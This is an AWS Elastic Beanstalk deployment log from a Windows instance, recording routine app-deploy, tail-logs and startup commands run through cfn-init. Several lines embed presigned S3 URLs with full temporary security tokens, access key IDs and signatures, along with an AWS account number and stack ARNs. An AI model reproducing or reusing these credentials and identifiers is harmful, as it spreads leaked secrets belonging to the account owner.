2025-07-16 14:27:17,472 DEBUG 1 CfnCommandWrapperApp.Command - Reading command data from S3: https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/0c7efe38-4a30-46e3-b3b0-9a4a025e7c07?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEEcaCXVzLWVhc3QtMSJIMEYCIQDQtLOoDcLspqr0FQK5I%2Fi3SZoL%2Bf%2B2TPdjUnyba11wtQIhAPTnB3vdXpyJ3upr6vQaAZcxVUPDVFsGQmYT5AQ8Ey0BKusCCF8QABoMMjU3MTcyMzkxMTQ5Igw8GQZdBMQM%2FW733wYqyAL4o7XsK9tnWacxq1rZytV%2BJNRbK5qEXkisvqrtfNcBQJ1soN5TwcTxavHrN5A4OeFN1rKYSvCChipM1eoZqgxkg94a9e5yLTgZ9hepNU9WRVnPUQ5QJBWYMko19sdRUvmygdW8vzLZ7FsEVKdV9Ko1VxZiuYPnxkonrgTzz2PXTOGs%2BSqSTqAIhXrfq4Tt2hbRfoqyBuky8XM8BMRlT0dzquClrTcTUZ3mw0%2FwZOFfS6uTGtQunGmTzlykJMXSqwMfu9HCqTaR8NgcwYQ0G2YfvwzmfvVAI3V7ZpIhyzGrcTMfVVGWLjK58WVSEFllnfthWIWZph%2BUK4LAssui%2FnnefI4yNoVIaAuANdrD6qwXkGpKJHflsw2gr244w3Jg1OdvIesRHdslvuOEAQZeiMOyOvrajFOEPpsmjIOqLNcMuh4TDrkAzJBTMP7k3sMGOr4B1ospW%2FRrcQGQ%2F0piWtJ81adoOM4TmGei2jxt8ARwgbYP3rhN2ltkLya%2BwIILJOrcviTm%2BPz6LWxwdL4gZ4PYxeHDftULArowfPbrasWA0ZYiQbpPogCTPsAOu04AGyvT5SBbblfRwdmBj7D46QKWB1CTZzaGx8W4noxcMf08%2FyF6kbI%2Bdj6FUom1u6HYlYlk4a%2FxRc27wjmoaDDSbrXk71j804BZndVftfwtfAoRDDjFdcb0CJeiybuxrd5Vhw%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250716T142717Z&X-Amz-SignedHeaders=host&X-Amz-Expires=300&X-Amz-Credential=ASIATXYFLITW34TIQYG7%2F20250716%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=91ea428a49d742496d0ffc656b3de52e88690b9e288f8561466ca3b3832af1cf
2025-07-16 14:27:17,690 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Trying to get Metadata with Key AWS::ElasticBeanstalk::Ext._API._Commands.CMD-AppDeploy._Stages from cache for Request ID c603753f-48ae-4516-be1c-4701b889b98f
2025-07-16 14:27:17,690 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Metadata cache file does not exist; file path: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-c603753f-48ae-4516-be1c-4701b889b98f
2025-07-16 14:27:17,690 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-get-metadata.exe -v -r AWSEBAutoScalingGroup -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 --region us-east-1
2025-07-16 14:27:17,690 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling cfn-get-metadata, request id: c603753f-48ae-4516-be1c-4701b889b98f, retry 0
2025-07-16 14:27:19,393 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - cfn-get-metadata exited with code 0
2025-07-16 14:27:19,393 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Creating directory for cached metadata: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache
2025-07-16 14:27:19,393 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Caching metadata to file: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-c603753f-48ae-4516-be1c-4701b889b98f
2025-07-16 14:27:19,409 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Returned metadata: {"01_pre":["Infra-WriteRuntimeConfig","Infra-EmbeddedPreBuild","Hook-PreAppDeploy","Infra-EmbeddedPostBuild"],"02_enact":["Hook-EnactAppDeploy","Hook-PostAppDeploy"]}
2025-07-16 14:27:19,409 DEBUG 1 CfnCommandWrapperApp.CommandWrapper - Config sets for command 'CMD-AppDeploy' (stage 'None'): Infra-WriteRuntimeConfig, Infra-EmbeddedPreBuild, Hook-PreAppDeploy, Infra-EmbeddedPostBuild, Hook-EnactAppDeploy, Hook-PostAppDeploy
2025-07-16 14:27:20,315 DEBUG 1 CfnCommandWrapperApp.Command - This instance was elected leader
2025-07-16 14:27:20,315 INFO 1 CfnCommandWrapperApp.Command - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-init.exe -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 -r AWSEBAutoScalingGroup --region us-east-1 -c Infra-WriteRuntimeConfig,Infra-EmbeddedPreBuild,Hook-PreAppDeploy,Infra-EmbeddedPostBuild,Hook-EnactAppDeploy,Hook-PostAppDeploy
2025-07-16 14:30:44,871 INFO 1 CfnCommandWrapperApp.CommandWrapper - Command: Id = de2a5a4e-f194-457b-9f19-a161e2d023b5, Dispatcher = arn:aws:cloudformation:us-east-1:958193682725:dispatcher/awseb-e-pf76dvqga3-stack/881d93a0-a192-48d7-8ce0-aed4a7be2345, Data = https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/9d57be20-7a6c-4926-9266-b84a7bc0eab9?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEEYaCXVzLWVhc3QtMSJIMEYCIQC%2B%2BzjI4k9B7ABCp9JLhlv3qv8FSQU0y4byL2wdEa2W6wIhAKqOm4602x%2BhBi3czaBaUVSwPr5gmsV7vEPF9o0%2FvtL2KusCCF8QABoMMjU3MTcyMzkxMTQ5IgyN1O3Yd3DvD1b8kiQqyALSSBPL6%2FTr30zqXGGKdPqK45885QY4o1M0qJU1lte3PirApsR0RRyScn5ib%2B3eUuDEgeX92%2F2DFVSNgW%2Blo3LNP94pMSxysk%2B1GRywojPoDJZoN5Xp6bkh5oHHjjrG8ANpHU418rVcU4TRcdBgEDf5QEBS3lQcfK7%2B1o8las%2Fp41miHOj2NINVVyYWigwlQr5DnB4BWZzlr0%2FGj8oPUGU4iqL%2BD6ZaQZpishpShfz1EXjeHOhLEN5M6lDL6fxH6UB14mkOrior9GcOXj1Sbl2mjzPAGmWjKJ%2ByVUzMJEbK%2Bz55IWQBsuxOAupv59rnaOkKCaNKwt4y6u8hMyBPJjVsQjMWOqLov8XjFcnbqm4Hm8bkq1qtwsfrlURXxPCMxVXysExdgqoGxssMcFHd69DYzRXv0zc%2B2f%2Bnd%2BLqnt0O4fGXKvruSljMMNbW3sMGOr4B%2BZFOz39uij8%2BuOz5jqPFyz2WOdX9vKGEVYIHtlXVlaQSnyi53AIWGmZCXhNtBfBrhRcBQExUxXO3q0UUgEgc%2FOuiyzWXLALZDKam3hl7V1jizqHKAFNWJQrPFmQU9nGeZviYWMcD%2FYAtTsUm%2FocTyCJfHDX5AdZLlEt7YeAtqImcC6h4sU8J5DonNpY1LBu5ne7XfqYUq%2F1MnZCm6PtUFCd5hOH7DEFKXiQC%2FkbtKPMzdsGDWwpl65S7GmJxqw%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250716T143044Z&X-Amz-SignedHeaders=host&X-Amz-Expires=300&X-Amz-Credential=ASIATXYFLITW2VQ7VFJU%2F20250716%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=1bcf10a4fd4eb8436f5aaa7f156ef66c6fc18cc577d130fbea4fd994c6269d21
2025-07-16 14:30:44,887 DEBUG 1 CfnCommandWrapperApp.Command - Reading command data from S3: https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/9d57be20-7a6c-4926-9266-b84a7bc0eab9?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEEYaCXVzLWVhc3QtMSJIMEYCIQC%2B%2BzjI4k9B7ABCp9JLhlv3qv8FSQU0y4byL2wdEa2W6wIhAKqOm4602x%2BhBi3czaBaUVSwPr5gmsV7vEPF9o0%2FvtL2KusCCF8QABoMMjU3MTcyMzkxMTQ5IgyN1O3Yd3DvD1b8kiQqyALSSBPL6%2FTr30zqXGGKdPqK45885QY4o1M0qJU1lte3PirApsR0RRyScn5ib%2B3eUuDEgeX92%2F2DFVSNgW%2Blo3LNP94pMSxysk%2B1GRywojPoDJZoN5Xp6bkh5oHHjjrG8ANpHU418rVcU4TRcdBgEDf5QEBS3lQcfK7%2B1o8las%2Fp41miHOj2NINVVyYWigwlQr5DnB4BWZzlr0%2FGj8oPUGU4iqL%2BD6ZaQZpishpShfz1EXjeHOhLEN5M6lDL6fxH6UB14mkOrior9GcOXj1Sbl2mjzPAGmWjKJ%2ByVUzMJEbK%2Bz55IWQBsuxOAupv59rnaOkKCaNKwt4y6u8hMyBPJjVsQjMWOqLov8XjFcnbqm4Hm8bkq1qtwsfrlURXxPCMxVXysExdgqoGxssMcFHd69DYzRXv0zc%2B2f%2Bnd%2BLqnt0O4fGXKvruSljMMNbW3sMGOr4B%2BZFOz39uij8%2BuOz5jqPFyz2WOdX9vKGEVYIHtlXVlaQSnyi53AIWGmZCXhNtBfBrhRcBQExUxXO3q0UUgEgc%2FOuiyzWXLALZDKam3hl7V1jizqHKAFNWJQrPFmQU9nGeZviYWMcD%2FYAtTsUm%2FocTyCJfHDX5AdZLlEt7YeAtqImcC6h4sU8J5DonNpY1LBu5ne7XfqYUq%2F1MnZCm6PtUFCd5hOH7DEFKXiQC%2FkbtKPMzdsGDWwpl65S7GmJxqw%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250716T143044Z&X-Amz-SignedHeaders=host&X-Amz-Expires=300&X-Amz-Credential=ASIATXYFLITW2VQ7VFJU%2F20250716%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=1bcf10a4fd4eb8436f5aaa7f156ef66c6fc18cc577d130fbea4fd994c6269d21
2025-07-16 14:30:44,996 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Trying to get Metadata with Key AWS::ElasticBeanstalk::Ext._API._Commands.CMD-TailLogs._Stages from cache for Request ID 193a9d8a-0dde-4f7b-9aec-d6a9175dd25d
2025-07-16 14:30:44,996 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Metadata cache file does not exist; file path: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-193a9d8a-0dde-4f7b-9aec-d6a9175dd25d
2025-07-16 14:30:44,996 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-get-metadata.exe -v -r AWSEBAutoScalingGroup -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 --region us-east-1
2025-07-16 14:30:44,996 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling cfn-get-metadata, request id: 193a9d8a-0dde-4f7b-9aec-d6a9175dd25d, retry 0
2025-07-16 14:30:45,902 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - cfn-get-metadata exited with code 0
2025-07-16 14:30:45,902 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Creating directory for cached metadata: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache
2025-07-16 14:30:45,902 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Caching metadata to file: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-193a9d8a-0dde-4f7b-9aec-d6a9175dd25d
2025-07-16 14:30:45,902 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Returned metadata: {"01_enact":["InfoTask-TailLogs"]}
2025-07-16 14:30:45,902 DEBUG 1 CfnCommandWrapperApp.CommandWrapper - Config sets for command 'CMD-TailLogs' (stage 'None'): InfoTask-TailLogs
2025-07-16 14:30:46,856 DEBUG 1 CfnCommandWrapperApp.Command - This instance was elected leader
2025-07-16 14:30:46,856 INFO 1 CfnCommandWrapperApp.Command - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-init.exe -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 -r AWSEBAutoScalingGroup --region us-east-1 -c InfoTask-TailLogs
2025-07-16 14:37:02,388 INFO 1 CfnCommandWrapperApp.CommandWrapper - Command: Id = 8fd77357-b973-4469-aad7-17ba9e7ba482, Dispatcher = arn:aws:cloudformation:us-east-1:958193682725:dispatcher/awseb-e-pf76dvqga3-stack/881d93a0-a192-48d7-8ce0-aed4a7be2345, Data = https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/c14ec4f4-6662-4bd4-be5d-3c98e0494e95?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEEcaCXVzLWVhc3QtMSJIMEYCIQCrLfJBO1y%2F8zC1yyrSQtP7YNOD4d%2FvSzH4nCalfrnQzgIhAIyThVhaV84GBW42%2F%2Bis88kjqZBoELfMXtu6MI4RTT8wKusCCGAQABoMMjU3MTcyMzkxMTQ5IgxPoq5KsZxs3xu87C0qyAKFgNKlfngVNgocUNTRymxZ0soPnHG%2BD0Us9T0dZ%2BL1d%2Fzq8JnztT4q7W9HrV6gcwaFGb7eNz214oFeqT%2FoZA7dSgzzHP8Hf7omjhhP1sYZL75MYNzxNV%2BGBbZJOq6YucQExxes0RUExSPAvF%2F%2FM5sLxayUe3EaYyEI8xvjXQZP88A6rR08LebGm4qk5B9xmXRBPBLjp5AIv9JgZJqU5d3Q9x6waWVwWI3PIl3sNnemlLhgRCJLoMVdOwAn0epqCAdwbxsNUkQ9CXHPUPXpfZiTPT4S57uT9KHXtt1GQ0qyS5CGlW70P4YdKw%2Fw%2Bs2WbMTYD5RUPj%2Bn6JU9d8ufwo2je5fIk1kRHlPvpX9zb5UkXqehH28174OI0fvO8fM26ApCqTmq%2B1wg%2FIFKcvz6%2FiooUnBXgl6NKjKubFE0QcCEyDK3ytYUkxP8MIDy3sMGOr4BcqyCJKj2%2FiRyt%2FaCL6wqMfzbsDdqjBEfMrjVAByLtPYDCNwgbu%2B03tM4txEom3mLhcBnExKvDXLcr6vjoPSamEztwZMoVCRuvIqvKnLH3c9kpfQkIlU1%2FC9huWWDnu0SVVuAEaZhwNJulgfNda5E6GTck9dBN2QkFOYYWJWelFd6KUdJtla3H1ZK13iKkagebF3t3hFA1NrcbL2aHb16KpBWok0KQ%2Bee35Btr5dG0uO7%2F6TVlerA9JpJQuhw8w%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250716T143701Z&X-Amz-SignedHeaders=host&X-Amz-Expires=299&X-Amz-Credential=ASIATXYFLITWRUPY2ZDG%2F20250716%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=419362798ea5c8f8bb0bae938fde9bac93f69b63d9ffa6b3cc757d38f3dd70e2
2025-07-16 14:37:02,388 DEBUG 1 CfnCommandWrapperApp.Command - Reading command data from S3: https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/c14ec4f4-6662-4bd4-be5d-3c98e0494e95?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEEcaCXVzLWVhc3QtMSJIMEYCIQCrLfJBO1y%2F8zC1yyrSQtP7YNOD4d%2FvSzH4nCalfrnQzgIhAIyThVhaV84GBW42%2F%2Bis88kjqZBoELfMXtu6MI4RTT8wKusCCGAQABoMMjU3MTcyMzkxMTQ5IgxPoq5KsZxs3xu87C0qyAKFgNKlfngVNgocUNTRymxZ0soPnHG%2BD0Us9T0dZ%2BL1d%2Fzq8JnztT4q7W9HrV6gcwaFGb7eNz214oFeqT%2FoZA7dSgzzHP8Hf7omjhhP1sYZL75MYNzxNV%2BGBbZJOq6YucQExxes0RUExSPAvF%2F%2FM5sLxayUe3EaYyEI8xvjXQZP88A6rR08LebGm4qk5B9xmXRBPBLjp5AIv9JgZJqU5d3Q9x6waWVwWI3PIl3sNnemlLhgRCJLoMVdOwAn0epqCAdwbxsNUkQ9CXHPUPXpfZiTPT4S57uT9KHXtt1GQ0qyS5CGlW70P4YdKw%2Fw%2Bs2WbMTYD5RUPj%2Bn6JU9d8ufwo2je5fIk1kRHlPvpX9zb5UkXqehH28174OI0fvO8fM26ApCqTmq%2B1wg%2FIFKcvz6%2FiooUnBXgl6NKjKubFE0QcCEyDK3ytYUkxP8MIDy3sMGOr4BcqyCJKj2%2FiRyt%2FaCL6wqMfzbsDdqjBEfMrjVAByLtPYDCNwgbu%2B03tM4txEom3mLhcBnExKvDXLcr6vjoPSamEztwZMoVCRuvIqvKnLH3c9kpfQkIlU1%2FC9huWWDnu0SVVuAEaZhwNJulgfNda5E6GTck9dBN2QkFOYYWJWelFd6KUdJtla3H1ZK13iKkagebF3t3hFA1NrcbL2aHb16KpBWok0KQ%2Bee35Btr5dG0uO7%2F6TVlerA9JpJQuhw8w%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250716T143701Z&X-Amz-SignedHeaders=host&X-Amz-Expires=299&X-Amz-Credential=ASIATXYFLITWRUPY2ZDG%2F20250716%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=419362798ea5c8f8bb0bae938fde9bac93f69b63d9ffa6b3cc757d38f3dd70e2
2025-07-16 14:37:02,545 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Trying to get Metadata with Key AWS::ElasticBeanstalk::Ext._API._Commands.CMD-TailLogs._Stages from cache for Request ID a5129810-e8ea-44b3-895f-a7a8f2479a53
2025-07-16 14:37:02,545 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Metadata cache file does not exist; file path: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-a5129810-e8ea-44b3-895f-a7a8f2479a53
2025-07-16 14:37:02,545 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-get-metadata.exe -v -r AWSEBAutoScalingGroup -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 --region us-east-1
2025-07-16 14:37:02,545 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling cfn-get-metadata, request id: a5129810-e8ea-44b3-895f-a7a8f2479a53, retry 0
2025-07-16 14:37:04,185 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - cfn-get-metadata exited with code 0
2025-07-16 14:37:04,185 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Creating directory for cached metadata: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache
2025-07-16 14:37:04,185 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Caching metadata to file: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-a5129810-e8ea-44b3-895f-a7a8f2479a53
2025-07-16 14:37:04,201 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Returned metadata: {"01_enact":["InfoTask-TailLogs"]}
2025-07-16 14:37:04,201 DEBUG 1 CfnCommandWrapperApp.CommandWrapper - Config sets for command 'CMD-TailLogs' (stage 'None'): InfoTask-TailLogs
2025-07-16 14:37:05,107 DEBUG 1 CfnCommandWrapperApp.Command - This instance was elected leader
2025-07-16 14:37:05,107 INFO 1 CfnCommandWrapperApp.Command - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-init.exe -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 -r AWSEBAutoScalingGroup --region us-east-1 -c InfoTask-TailLogs
2025-07-14 10:33:32,997 INFO 1 CfnCommandWrapperApp.CommandWrapper - Command: Id = 1c2f8f71-8230-4118-805d-aed5569a5d9e, Dispatcher = arn:aws:cloudformation:us-east-1:958193682725:dispatcher/awseb-e-pf76dvqga3-stack/881d93a0-a192-48d7-8ce0-aed4a7be2345, Data = https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/f92ca82a-a576-48c4-ad1b-de3c5bc07d22?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBMaCXVzLWVhc3QtMSJHMEUCIQD7%2B%2BqQkXbmfkBS8wOewiWLlw%2F41prz5OKF7cmyCGQzQQIgI9%2BiDqLQxR2dw4lbRLF%2BCV7HmL5VTGzaRRpaUUbugVYq6wIIKxAAGgwyNTcxNzIzOTExNDkiDCO8u8b8wYh7O9cQeCrIAqhAlhh7bDf6JzzNuHUAv02jt3cynXXUpk%2BKR5qDiuPSoTZ53AgQoAvnYJW2Cpy43Edyj%2F%2Fw%2FN%2FEVeuAPJD18IIbxaeMsQ4sXPSNK4yIduPscvvwMRohJO%2FSaqnWAVxmJ9zy0EkH%2Bi1UKPpyvTCh1%2BefBQeiWhawUN6QjdfNOQarYy46MwtLQDiujj%2FKRmHZ3vxF2bVj%2B90ho7I5pwL1EuILTWYkxJexqJIW2rma8zHEkKf02LQeSrK%2BqNlO%2FGMVMO4wH6xtYIr%2FwCEmUuRQj99WwK67VnnHXILdu96OjbcIL7tVob%2BZqMpDcVBDlIHsRjqJg3Xlv8opoAMMCASt0pnQFoPlban1ijbk90PjT2BNUBFb4gDNvSNIs3QIaEzhA8PyKXn8xF83YjA%2BCzXPgHsbCSzrjvjj4YJwJIEf2wQxy20irgf4wX0wla%2FTwwY6vwGRf%2FEh6AOVMpRFDSE7ObpqqIuHHqYoidfWlKNE8rOunWhLtYC03D5k%2FwK4JKkGhVzirqTtxSUqMu9gxHaTc82I2Qx27vjj61MpU7MesGGTi0%2FvTlKjKjt13ZP2Cn%2F8xmxa6RzVnXkSu8WFtdRdqDxQ5pBTkoRdgD6nO19AdrgrOx0qA7eguK0sZ47Cl48GGduzasSaPLut3o7qjwxeIFlTrvRWzlagj7wineyuHMnDpGXL6l9oBwJ7qKkp5XcuYQ%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250714T103332Z&X-Amz-SignedHeaders=host&X-Amz-Expires=300&X-Amz-Credential=ASIATXYFLITW5QKCS4LO%2F20250714%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=3faa6c7ae0d123c59681b0716f7742cc1585d939294a66b99d3f5b38e11f006e
2025-07-14 10:33:33,013 DEBUG 1 CfnCommandWrapperApp.Command - Reading command data from S3: https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/f92ca82a-a576-48c4-ad1b-de3c5bc07d22?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBMaCXVzLWVhc3QtMSJHMEUCIQD7%2B%2BqQkXbmfkBS8wOewiWLlw%2F41prz5OKF7cmyCGQzQQIgI9%2BiDqLQxR2dw4lbRLF%2BCV7HmL5VTGzaRRpaUUbugVYq6wIIKxAAGgwyNTcxNzIzOTExNDkiDCO8u8b8wYh7O9cQeCrIAqhAlhh7bDf6JzzNuHUAv02jt3cynXXUpk%2BKR5qDiuPSoTZ53AgQoAvnYJW2Cpy43Edyj%2F%2Fw%2FN%2FEVeuAPJD18IIbxaeMsQ4sXPSNK4yIduPscvvwMRohJO%2FSaqnWAVxmJ9zy0EkH%2Bi1UKPpyvTCh1%2BefBQeiWhawUN6QjdfNOQarYy46MwtLQDiujj%2FKRmHZ3vxF2bVj%2B90ho7I5pwL1EuILTWYkxJexqJIW2rma8zHEkKf02LQeSrK%2BqNlO%2FGMVMO4wH6xtYIr%2FwCEmUuRQj99WwK67VnnHXILdu96OjbcIL7tVob%2BZqMpDcVBDlIHsRjqJg3Xlv8opoAMMCASt0pnQFoPlban1ijbk90PjT2BNUBFb4gDNvSNIs3QIaEzhA8PyKXn8xF83YjA%2BCzXPgHsbCSzrjvjj4YJwJIEf2wQxy20irgf4wX0wla%2FTwwY6vwGRf%2FEh6AOVMpRFDSE7ObpqqIuHHqYoidfWlKNE8rOunWhLtYC03D5k%2FwK4JKkGhVzirqTtxSUqMu9gxHaTc82I2Qx27vjj61MpU7MesGGTi0%2FvTlKjKjt13ZP2Cn%2F8xmxa6RzVnXkSu8WFtdRdqDxQ5pBTkoRdgD6nO19AdrgrOx0qA7eguK0sZ47Cl48GGduzasSaPLut3o7qjwxeIFlTrvRWzlagj7wineyuHMnDpGXL6l9oBwJ7qKkp5XcuYQ%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250714T103332Z&X-Amz-SignedHeaders=host&X-Amz-Expires=300&X-Amz-Credential=ASIATXYFLITW5QKCS4LO%2F20250714%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=3faa6c7ae0d123c59681b0716f7742cc1585d939294a66b99d3f5b38e11f006e
2025-07-14 10:33:37,957 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Trying to get Metadata with Key AWS::ElasticBeanstalk::Ext._API._Commands.CMD-Startup._Stages from cache for Request ID 77319fd8-070a-4273-9cd3-dd0c2a552859
2025-07-14 10:33:37,957 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Metadata cache file does not exist; file path: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-77319fd8-070a-4273-9cd3-dd0c2a552859
2025-07-14 10:33:37,957 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-get-metadata.exe -v -r AWSEBAutoScalingGroup -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 --region us-east-1
2025-07-14 10:33:37,957 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling cfn-get-metadata, request id: 77319fd8-070a-4273-9cd3-dd0c2a552859, retry 0
2025-07-14 10:33:50,788 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - cfn-get-metadata exited with code 0
2025-07-14 10:33:50,835 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Failed to remove the old cache folder c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache with exception Could not find a part of the path 'c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache'., move on
2025-07-14 10:33:50,835 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Creating directory for cached metadata: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache
2025-07-14 10:33:50,835 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Caching metadata to file: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-77319fd8-070a-4273-9cd3-dd0c2a552859
2025-07-14 10:33:50,835 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Returned metadata: {"01_pre":["Infra-EmbeddedPreBuild","Hook-PostInit","Hook-PreAppDeploy","Infra-EmbeddedPostBuild"],"02_enact":["Hook-EnactAppDeploy","Hook-PostAppDeploy","Infra-WriteVersionOnStartup"]}
2025-07-14 10:33:50,851 DEBUG 1 CfnCommandWrapperApp.CommandWrapper - Config sets for command 'CMD-Startup' (stage 'None'): Infra-EmbeddedPreBuild, Hook-PostInit, Hook-PreAppDeploy, Infra-EmbeddedPostBuild, Hook-EnactAppDeploy, Hook-PostAppDeploy, Infra-WriteVersionOnStartup
2025-07-14 10:33:55,181 DEBUG 1 CfnCommandWrapperApp.Command - This instance was elected leader
2025-07-14 10:33:55,181 INFO 1 CfnCommandWrapperApp.Command - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-init.exe -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 -r AWSEBAutoScalingGroup --region us-east-1 -c Infra-EmbeddedPreBuild,Hook-PostInit,Hook-PreAppDeploy,Infra-EmbeddedPostBuild,Hook-EnactAppDeploy,Hook-PostAppDeploy,Infra-WriteVersionOnStartup
